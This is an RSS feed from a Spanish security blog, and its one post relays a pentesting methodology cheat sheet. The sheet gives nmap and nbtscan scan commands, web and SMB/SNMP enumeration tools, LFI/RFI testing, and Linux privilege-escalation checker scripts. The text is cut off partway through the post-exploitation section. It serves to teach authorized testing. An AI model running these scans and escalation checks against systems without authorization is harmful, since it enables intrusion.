<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-8268567775100190466</atom:id><lastBuildDate>Tue, 01 Oct 2019 16:44:25 +0000</lastBuildDate><category>Seguridad</category><category>Noticias</category><category>Hacking</category><category>Tools</category><category>Security</category><category>Vulnerabilidad</category><category>Pentester</category><category>ST2Labs</category><category>Formación</category><category>Android</category><category>Pentesting</category><category>Seguridad Moviles</category><category>Malware</category><category>Web</category><category>Google</category><category>Seclabs</category><category>Metasploit</category><category>Update</category><category>IT Security</category><category>Antivirus</category><category>Chrome</category><category>Forensics</category><category>Internet</category><category>Actualización</category><category>Ciberseguridad</category><category>Linux</category><category>Privacidad</category><category>Herramienta</category><category>Navegador</category><category>Windows</category><category>Analisis</category><category>Ataque</category><category>Cloud Computing</category><category>Flash</category><category>Jornadas</category><category>Protección</category><category>Exploit</category><category>Password</category><category>Seguridad de la Información</category><category>Sevilla</category><category>INTECO-CERT</category><category>Wifi</category><category>Windows 8</category><category>Wireless</category><category>XSS</category><category>Auditor</category><category>Facebook</category><category>Java</category><category>Microsoft</category><category>Network</category><category>SANS</category><category>SXato2</category><category>Seguridad Móviles</category><category>TIC</category><category>zero-day</category><category>Add-ons</category><category>Alerta</category><category>Anonymous</category><category>AppVMs</category><category>Compliance</category><category>Computer Security</category><category>Mobile</category><category>Shell</category><category>Taller</category><category>configuración segura</category><category>iPhone</category><category>Adobe</category><category>Amenazas</category><category>Analysis</category><category>Apps</category><category>Attack</category><category>Configuración</category><category>Consejos</category><category>Curso</category><category>DNS</category><category>Defensa</category><category>ETS Ingenieros</category><category>Eventos</category><category>Firefox</category><category>How to</category><category>Nube</category><category>OnLine</category><category>PDF</category><category>Python</category><category>Qubes-OS</category><category>ST2</category><category>Smartphone</category><category>VM</category><category>iOS</category><category>2011</category><category>ARM</category><category>Blog</category><category>Browser</category><category>Challege</category><category>Christmas</category><category>Cifrado</category><category>DFIR</category><category>ENCODE</category><category>Firewall</category><category>Guide</category><category>HTTPS</category><category>IP</category><category>IT Security Audit</category><category>Incident</category><category>Ingeniería Social</category><category>Kali</category><category>Magazine</category><category>Master</category><category>Metodología</category><category>Navidad</category><category>Normativa</category><category>OS</category><category>OWASP</category><category>Open Source</category><category>Opinión</category><category>PAYLOAD</category><category>Parte 1</category><category>Pi</category><category>Redes</category><category>SQL Injection</category><category>SSL</category><category>STIC</category><category>Script</category><category>Solution</category><category>Universidad</category><category>Webminar</category><category>Whatsapp</category><category>kaliLinux</category><category>parte 3</category><category>raspbeery</category><category>2012</category><category>2013</category><category>2015</category><category>Actualidad</category><category>Alemania</category><category>Apple</category><category>Backups</category><category>CCC</category><category>CCN-CERT</category><category>CVE</category><category>Cheat Sheet</category><category>Commands</category><category>Copia de Seguridad</category><category>Cracking</category><category>CyberDefense</category><category>ENS</category><category>ETSI</category><category>Essentials</category><category>Famosos</category><category>Feliz</category><category>Framework</category><category>German</category><category>Gobierno</category><category>Hispasec</category><category>Informe</category><category>Insolation</category><category>Jazztel</category><category>Kernel</category><category>Libro</category><category>Lists</category><category>Logs</category><category>MSFP</category><category>Madrid</category><category>Mejoras</category><category>Meterpreter</category><category>Movistar</category><category>OSINT</category><category>Packet</category><category>Part I</category><category>Parte 2</category><category>Phishing</category><category>Pivoting</category><category>Proxy</category><category>R2D2</category><category>Recomendación</category><category>Root</category><category>ST2Blog</category><category>Scanner</category><category>SecurimaTICa</category><category>Seguridad Informatica</category><category>Solve</category><category>System</category><category>TLS</category><category>USB</category><category>VMware</category><category>Videos</category><category>Virus</category><category>VoIP</category><category>Vulnerabilidades</category><category>WPA</category><category>Webcast</category><category>Windows 7</category><category>XEN</category><category>berryboot</category><category>database</category><category>parte2</category><category>sqlite</category><category>16N</category><category>3G</category><category>AAPP</category><category>AES</category><category>Activos</category><category>Administrador</category><category>Almacenamiento</category><category>Apache</category><category>Aplicaciones</category><category>Ataques</category><category>Audit</category><category>Autenticación</category><category>Avanzado</category><category>BEAST</category><category>Book</category><category>Bot</category><category>Botnet</category><category>Brute Force Attack</category><category>BuyVip</category><category>CISCO</category><category>CNP</category><category>Certificados</category><category>Chaos Computer Club</category><category>Claves</category><category>Converter</category><category>Cortafuegos</category><category>Criticas</category><category>Cursos</category><category>Córdoba</category><category>DDoS</category><category>Datos</category><category>Desktop Computing</category><category>Digital</category><category>Distro</category><category>Documentation</category><category>Documentos</category><category>EMET</category><category>Empresa</category><category>Encryption</category><category>Estadisticas</category><category>Estrategia</category><category>Experto</category><category>Explorer</category><category>Fase</category><category>Fixed</category><category>Free</category><category>GSM</category><category>Generation</category><category>Gestión</category><category>GooHS</category><category>Google+</category><category>HSTS</category><category>HTC</category><category>HTTP</category><category>Hacktivism</category><category>Handler</category><category>Herramientas</category><category>IDS</category><category>INTECO</category><category>ISO 27001</category><category>Incidencias</category><category>Keylogger</category><category>LOPD</category><category>Labs</category><category>Lenguaje</category><category>MSE</category><category>MSF</category><category>MSOC</category><category>Monitorización</category><category>Mozilla Firefox</category><category>NGINX</category><category>NIST</category><category>NetworkMiner</category><category>Next Security OS Generation</category><category>Nirsof</category><category>Política</category><category>Post Explotiation</category><category>Principiante</category><category>Procedimientos</category><category>Programacion</category><category>Prot-ON</category><category>Protected</category><category>QR Codes</category><category>Qubes</category><category>RFC</category><category>Reconocimiento</category><category>Reseacher</category><category>Reverse</category><category>Router</category><category>SCADs</category><category>SONY</category><category>Server</category><category>Sistema</category><category>Sistemas</category><category>Sniffer</category><category>Snort</category><category>Software</category><category>TOR</category><category>Threat</category><category>Troyano</category><category>UCO</category><category>Vector</category><category>Virtual</category><category>Virtual System</category><category>VirusTotal</category><category>Vulnerability</category><category>WAF</category><category>WPA2</category><category>Webapps</category><category>WifiAuditor</category><category>XMas</category><category>bypass</category><category>cybersecurity</category><category>website</category><category>2012-1182</category><category>2016</category><category>2G</category><category>3 Edición</category><category>31C</category><category>4G</category><category>ACONSA</category><category>ACSiSecurity</category><category>ANTPJI</category><category>AP</category><category>ARDrone</category><category>ARP</category><category>ASLR</category><category>ASP.NET</category><category>ASafaWEB</category><category>AVG</category><category>Academía</category><category>Accenture</category><category>Andalucía</category><category>Andromeda</category><category>Appstore</category><category>Assessment</category><category>Auditoria</category><category>Aula</category><category>Award</category><category>BOE</category><category>BackTrack</category><category>Backdoor</category><category>Base64</category><category>Baseline</category><category>Beers</category><category>Begginers</category><category>Beta 2</category><category>Beta3</category><category>Bidikey</category><category>Bienvenidos</category><category>BigData</category><category>Blackberry</category><category>Blacklist</category><category>Blacksheep</category><category>Boletin</category><category>Boxcryptor</category><category>Break</category><category>Bridge</category><category>Buenas Practicas</category><category>Bug</category><category>Bugs</category><category>CAINE</category><category>CCDCoE</category><category>CCI</category><category>CIR</category><category>CIS</category><category>CMD</category><category>CNIS</category><category>CONAN</category><category>CONpiler</category><category>CSA</category><category>CSF</category><category>CTF</category><category>CVE-2012-2808</category><category>CYCON</category><category>Cambios</category><category>CanalSeguro</category><category>Capture</category><category>CarrierIQ</category><category>CentOS</category><category>Charlas</category><category>Ciberguerra</category><category>Ciclo</category><category>Clases</category><category>Class</category><category>Clickjacking</category><category>Cluster</category><category>CoSfera</category><category>Code</category><category>Comprobación</category><category>Comunicaciones</category><category>Conficker</category><category>Congress</category><category>Conjure-up</category><category>Control</category><category>Copy</category><category>Cordoba</category><category>Correo</category><category>Covert Channels</category><category>Criptografia</category><category>Cronica</category><category>Crypt4you</category><category>CryptoChat</category><category>Cryptocat</category><category>Cryptored</category><category>Custom</category><category>CyberSOC</category><category>CyberWarfare</category><category>DEP</category><category>DNSSEC</category><category>DVD-Live</category><category>Data</category><category>Datos Personales</category><category>Default</category><category>Demo</category><category>Desarrolladores</category><category>Destacados</category><category>Directiva Europea</category><category>Discretio</category><category>DoS</category><category>Docker</category><category>DroidBox</category><category>DroidCAT</category><category>Dropbox</category><category>Duqu</category><category>E-Learning</category><category>EKOPARTY</category><category>EMAD</category><category>ENI</category><category>ENISA</category><category>ENISE</category><category>ESET</category><category>Easy</category><category>Ebook</category><category>Elevated Privileges</category><category>Escandalo</category><category>Escritorio Remoto</category><category>España</category><category>Estudiantes</category><category>Etico</category><category>Exploitshield</category><category>Extension</category><category>Exynos4</category><category>FBPwn</category><category>FaaS</category><category>FileVault</category><category>Finger</category><category>Firesheep</category><category>Firmas</category><category>Firmware</category><category>Format</category><category>Foro</category><category>Fotografía</category><category>Freware</category><category>Front</category><category>Frooger</category><category>G+</category><category>GIAC</category><category>GUI</category><category>GWT</category><category>Games</category><category>Geolocalización</category><category>Gmail</category><category>HIDS</category><category>HTML</category><category>HTTS</category><category>HUMOR</category><category>Hackin</category><category>Haking</category><category>Hashes</category><category>Helicóptero</category><category>Hijacking</category><category>Hopping</category><category>Hotmail</category><category>IPS</category><category>ISACA</category><category>ISDEFE</category><category>ISO</category><category>ISO 27002</category><category>IV</category><category>Iberdrola</category><category>Infeccion</category><category>Info</category><category>Infografia</category><category>Información</category><category>Information</category><category>Information Leak</category><category>Infospyware</category><category>Infraestructuras</category><category>Ingenieros</category><category>Integrity</category><category>Intelligence</category><category>Introducción</category><category>Investigador</category><category>Issues</category><category>Javascripts</category><category>KDE</category><category>KVM</category><category>Karsperky</category><category>Kit</category><category>LG</category><category>LNK</category><category>LSSI</category><category>LTE</category><category>LXD</category><category>Legal</category><category>Legislación</category><category>Level</category><category>Ley</category><category>Liebster</category><category>Llamadas</category><category>Lock</category><category>MDEF</category><category>MITM</category><category>MS10_046</category><category>MS11-083</category><category>MS12-020</category><category>MSFMap</category><category>MSN</category><category>MSTIC</category><category>Make</category><category>MantisBT</category><category>Mantra</category><category>Manual</category><category>Map</category><category>Matriculación</category><category>McAfee</category><category>Metadatos</category><category>Mineria de Datos</category><category>Modulo</category><category>Máster</category><category>NAC</category><category>NATO</category><category>NAXSI</category><category>NMAP</category><category>NOC</category><category>NSA</category><category>NSM</category><category>Nacional</category><category>Network Security Monitor</category><category>Next</category><category>Nexus</category><category>No-Script</category><category>Nokia</category><category>Norton</category><category>Notifier</category><category>OSI</category><category>OSSAMS</category><category>OSSIM</category><category>Octubre</category><category>Office</category><category>Offline</category><category>OpenStack</category><category>Opendomo</category><category>Oracle</category><category>Orbot</category><category>Outbound</category><category>PKI</category><category>PSN</category><category>PYH1</category><category>PYMES</category><category>PacketFence</category><category>Paper</category><category>Parche</category><category>Part 3</category><category>Part II</category><category>Part III</category><category>Patriot NG</category><category>Pen-Testing</category><category>Penetrate</category><category>Petesting</category><category>Pinboard</category><category>Pinterest</category><category>Plantillas</category><category>Plattaform</category><category>PlayStation</category><category>Plazo</category><category>PoC</category><category>Premio</category><category>Presentacion</category><category>Primeras Impresiones</category><category>Problemas</category><category>Procesos</category><category>Process</category><category>Protocol</category><category>Proyectos</category><category>Public</category><category>Publico</category><category>PulWifi</category><category>Puntos</category><category>Q2k16</category><category>QEMU</category><category>R2RC1</category><category>RDP</category><category>ROM</category><category>RPi</category><category>Rapid7</category><category>Rasomware</category><category>Real-Time</category><category>Red</category><category>Referencia</category><category>Reputation</category><category>Resuem</category><category>Resumen</category><category>Reto</category><category>Revista</category><category>Robo</category><category>Rogue</category><category>RootedCON</category><category>Rooting</category><category>Rootkit</category><category>Rules</category><category>Run</category><category>SCADA</category><category>SCOUT</category><category>SEO</category><category>SGADs</category><category>SGSI</category><category>SGSII</category><category>SID</category><category>SIEM</category><category>SMS</category><category>SO</category><category>SOAP</category><category>SOC</category><category>SP-800-144</category><category>SP-800-61</category><category>SPAM</category><category>SSLCop</category><category>SVTCloud</category><category>SWSE</category><category>Samba</category><category>Samsung</category><category>Sandbox</category><category>Sandworm</category><category>Sección</category><category>Secure</category><category>Security Breach</category><category>Security Onion</category><category>Security+</category><category>SecurityTube</category><category>Seguras</category><category>Seminario</category><category>Servicio</category><category>Sesion</category><category>Setup</category><category>Sguil</category><category>Shadow</category><category>Skype</category><category>SmartSniff</category><category>Social</category><category>Socket</category><category>Spy</category><category>SpyEye</category><category>Spyware</category><category>Squert</category><category>Storage</category><category>Stratfor</category><category>Strong</category><category>Stuxnet</category><category>Syringe</category><category>SysAdmin</category><category>T-Shark</category><category>TA</category><category>TIPS</category><category>Tablon de Anuncios</category><category>Take it Away</category><category>TeamDrive</category><category>Telefonica</category><category>Teliad</category><category>Tesis</category><category>Testing</category><category>TinyWall</category><category>Todos</category><category>Traffic</category><category>TrendMicro</category><category>Trendnet</category><category>UDIMA</category><category>UPNP</category><category>UPyD</category><category>URL</category><category>US-CERT</category><category>USBDeview</category><category>Ubuntu</category><category>Unix</category><category>User</category><category>VEGA</category><category>VENOM</category><category>VLAN</category><category>VSC</category><category>VUPEN</category><category>Volume</category><category>Voz</category><category>W3C</category><category>W8Pro</category><category>WFN</category><category>WIL</category><category>WPS</category><category>Wapiti</category><category>WebFinger</category><category>Webcam</category><category>Wifileaks</category><category>WinLockLess</category><category>Winer</category><category>Wireless Network Watcher</category><category>Wireshark</category><category>X-Ray</category><category>XI</category><category>XML</category><category>XSSF</category><category>Xenotix</category><category>Xplico</category><category>Yersinia</category><category>Zappos</category><category>analyzer</category><category>backbuntu</category><category>bash</category><category>cortex</category><category>cyanogen</category><category>cymon</category><category>dfslite</category><category>dfsqlite</category><category>dfsqlite2</category><category>dfsqlite3</category><category>dftime</category><category>domótica</category><category>engine</category><category>flickr</category><category>hardening</category><category>iptables</category><category>lolipop</category><category>overclocking</category><category>parte 4</category><category>pathsync</category><category>shellshock</category><category>thehive</category><category>tool</category><category>unhide</category><category>v1</category><category>winunhide</category><title>Seguridad para Todos | ST2 </title><description>Blog especializado en Ciberseguridad | Cibersecurity matters #Pentesting #Hacking #Security #Hardening #Compliance #Defense #SVTCloud #ST2Labs #SOC #Security #MSOC #Monitoring #SIEM #ELK #Alerta</description><link>http://www.seguridadparatodos.es/</link><managingEditor>noreply@blogger.com (Julian J. Gonzalez)</managingEditor><generator>Blogger</generator><openSearch:totalResults>318</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-5974843621955919798</guid><pubDate>Tue, 01 Oct 2019 07:39:00 +0000</pubDate><atom:updated>2019-10-01T09:39:22.564+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Audit</category><category domain="http://www.blogger.com/atom/ns#">cybersecurity</category><category domain="http://www.blogger.com/atom/ns#">Guide</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">How to</category><category domain="http://www.blogger.com/atom/ns#">IT Security</category><category domain="http://www.blogger.com/atom/ns#">Lists</category><category domain="http://www.blogger.com/atom/ns#">Pentester</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">Tools</category><title>Guia rápida para realizar un Pentesting</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-yAtoez_xS74/XZMCYpOYFGI/AAAAAAAAftk/wz0CLkCYyfQAnghT_zB3crYHcaZd2mTRACLcBGAsYHQ/s1600/guia_pentest.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;509&quot; data-original-width=&quot;618&quot; height=&quot;526&quot; src=&quot;https://1.bp.blogspot.com/-yAtoez_xS74/XZMCYpOYFGI/AAAAAAAAftk/wz0CLkCYyfQAnghT_zB3crYHcaZd2mTRACLcBGAsYHQ/s640/guia_pentest.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Autor&lt;/b&gt;: &lt;a href=&quot;https://twitter.com/perito_inf/status/1178741955561492481&quot;&gt;Israel Nada&lt;/a&gt;l&lt;br /&gt;&lt;br /&gt;A través de su cuenta de Twitter, publico un hilo donde explicaba de forma sencilla y concreta, su metodología para realizar un Pentesting.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Guía para realizar un Pentesting de Israel Nadal&lt;/h2&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;b&gt;ESCANEO DE LA RED&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;nmap -sn 10.11.1.* nmap -sL 10.11.1.* nbtscan -r 10.11.1.0/24 smbtree netdiscover&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;b&gt;ESCANEO AL HOST&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;nmap --top-ports 20 --open -iL iplist.txt nmap -sS -A -sV -O -p- ipaddress nmap -sU ipaddress&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;b&gt;ESCANEO DE LOS SERVICIOS&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;b&gt;SERVICIOS WEB&lt;/b&gt;Nikto dirb dirbuster wpscan otdotpwn view source  davtest\cadevar droopscan joomscan LFI\RFI Test  &lt;b&gt;S.O. LINUX/WINDOWS&lt;/b&gt;snmpwalk -c public -v1 ipaddress&amp;nbsp;1 smbclient -L //ipaddress showmount -e ipaddress port rpcinfo Enum4Linux&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;b&gt;OTROS&lt;/b&gt;nmap scripts (locate *nse* | grep servicename) MSF Aux Modules&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style=&quot;background-color: white; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class=&quot;css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;&lt;b&gt;POST EXPLOTACIÓN&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div class=&quot;css-901oao r-hkyrab r-1qd0xha r-a023e6 r-16dba41 r-ad9z0x r-bcqeeo r-bnwqim r-qvutc0&quot; dir=&quot;auto&quot; id=&quot;tweet-text&quot; lang=&quot;ca&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: #14171a; display: inline; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; position: relative; white-space: pre-wrap;&quot;&gt;&lt;span class=&quot;css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;&lt;u&gt;LINUX&lt;/u&gt;&lt;/span&gt;&lt;a class=&quot;css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; data-focusable=&quot;true&quot; dir=&quot;ltr&quot; href=&quot;https://t.co/6MOo9y29f0?amp=1&quot; rel=&quot; noopener noreferrer&quot; role=&quot;link&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: #1b95e0; cursor: pointer; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; list-style: none; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; text-align: inherit; text-decoration-line: none; white-space: inherit;&quot; target=&quot;_blank&quot; title=&quot;http://linux-local-enum.sh&quot;&gt;&lt;span aria-hidden=&quot;true&quot; class=&quot;css-901oao css-16my406 r-1qd0xha r-hiw28u r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;http://&lt;/span&gt;linux-local-enum.sh&lt;/a&gt;&lt;span class=&quot;css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;&lt;/span&gt;&lt;a class=&quot;css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; data-focusable=&quot;true&quot; dir=&quot;ltr&quot; href=&quot;https://t.co/0uIPlsQc3a?amp=1&quot; rel=&quot; noopener noreferrer&quot; role=&quot;link&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: #1b95e0; cursor: pointer; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; list-style: none; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; text-align: inherit; text-decoration-line: none; white-space: inherit;&quot; target=&quot;_blank&quot; title=&quot;http://inuxprivchecker.py&quot;&gt;&lt;span aria-hidden=&quot;true&quot; class=&quot;css-901oao css-16my406 r-1qd0xha r-hiw28u r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;http://&lt;/span&gt;inuxprivchecker.py&lt;/a&gt;&lt;span class=&quot;css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;&lt;/span&gt;&lt;a class=&quot;css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; data-focusable=&quot;true&quot; dir=&quot;ltr&quot; href=&quot;https://t.co/MbsnBRDpqg?amp=1&quot; rel=&quot; noopener noreferrer&quot; role=&quot;link&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: #1b95e0; cursor: pointer; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; list-style: none; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; text-align: inherit; text-decoration-line: none; white-space: inherit;&quot; target=&quot;_blank&quot; title=&quot;http://linux-exploit-suggestor.sh&quot;&gt;&lt;span aria-hidden=&quot;true&quot; class=&quot;css-901oao css-16my406 r-1qd0xha r-hiw28u r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;http://&lt;/span&gt;linux-exploit-suggestor.sh&lt;/a&gt;&lt;span class=&quot;css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;&lt;/span&gt;&lt;a class=&quot;css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; data-focusable=&quot;true&quot; dir=&quot;ltr&quot; href=&quot;https://t.co/wW1krKrUK3?amp=1&quot; rel=&quot; noopener noreferrer&quot; role=&quot;link&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: #1b95e0; cursor: pointer; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; list-style: none; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; text-align: inherit; text-decoration-line: none; white-space: inherit;&quot; target=&quot;_blank&quot; title=&quot;http://unix-privesc-check.py&quot;&gt;&lt;span aria-hidden=&quot;true&quot; class=&quot;css-901oao css-16my406 r-1qd0xha r-hiw28u r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;http://&lt;/span&gt;unix-privesc-check.py&lt;/a&gt;&lt;span class=&quot;css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: 